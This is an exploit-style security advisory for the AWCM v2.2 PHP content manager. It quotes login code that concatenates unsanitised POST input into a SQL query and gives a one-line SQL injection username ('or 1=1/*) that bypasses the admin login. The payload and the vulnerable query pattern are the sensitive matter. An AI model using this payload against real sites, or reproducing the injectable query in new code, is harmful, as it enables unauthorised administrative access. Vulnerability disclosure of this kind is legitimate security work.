########################################################
AWCM v2.2 Auth Bypass Vulnerabilities
########################################################
/\ `\ /\ \ __ /\ \__/\ \
\ \ \L\\__ __ \ \ \/'\ /\\ ___ __ \ \ ,\ \ \__ __
\ \ \/\ \/\ \ /'\ \ , < \/\ \ /' _ `\ /' `\ \ \ \/\ \ _ `\ /'`\
\ \ \/\ \ \_\ \/\ \/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \\ \ \ \ \/\ __/
\ \\ \ \/\ \\\ \\ \\ \\ \\ \\ \___ \ \ \\\ \\ \\ \\
\// \// \// \//\//\//\//\//\/L\ \ \// \//\//\//
/\/
\_//
__ __ __ ______ By:eidelweiss
/\ \ /\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ \ \ \ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'`\ \ '`\ \ \ __ \/\ '`\/\ '`\ /',\
\ \ \/ \\ \/\ /\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\, `\
\ `\x/\ \___\\ \,/ \ \\ \\ \ ,/\ \ ,/\/\____/
'\//// \// \// \//\//\ \ \/ \ \ \/ \//
\ \\ \ \\
\// \/_/
[+]Script: AWCM
[+]Version: 2.2 final
[+]Download: http://sourceforge.net/projects/awcm/files/AWCM%20v2.2/AWCM%20v2.2%20final.zip/download
########################################################
[!]Author : eidelweiss
[!]Contact: eidelweiss[at]windowslive[dot]com
[!]Blog: http://eidelweiss-advisories.blogspot.com
[!]Gratz : DealCyber member`s , yogyacarderlink crew , and YOU !!!
Original Advisories:
http://eidelweiss-advisories.blogspot.com/2010/11/awcm-v22-auth-bypass-vulnerabilities.html
########################################################
-=[Description]=-
ar web content manager is a free web contemts management system (cms) built with php , mysql , css , javascript , css to allow you to manage your website easily and fast.
it contains many main categories such as (videos, topics, sounds, photo gallery.
########################################################
-=[VUln Code]=-
first lets we see the code on login.php file
<?php
include ("header.php");
$pusername = $_POST['username'];
$ppassword = md5($_POST['password']);
$premember = $_POST['remember'];
ok, now we see the code in control/login.php file
and on this file i see the vulnerability code that can be used by attacker or anonymous to bypass the login sectionβ¦
its also possible to gain the administrator access ( if you lucky ofcourse :D )
here the code on control/login.php file:
<?php
$page = 'login';
include ("common.php");
if(isset($_GET['do'])) {
$user = $_POST['username']; // <= i dont give fuck
$pass = md5($_POST['password']); //
$cp_login_query = mysql_query("SELECT id,username,password,level FROM awcm_members WHERE level = 'admin' AND username = '$user' AND password = '$pass'");
$cp_login_total = mysql_num_rows($cp_login_query);
########################################################
-=[ How To Exploit / P0C ]=-
put as username : 'or 1=1/*
=========================| -=[ E0F ]=- |============================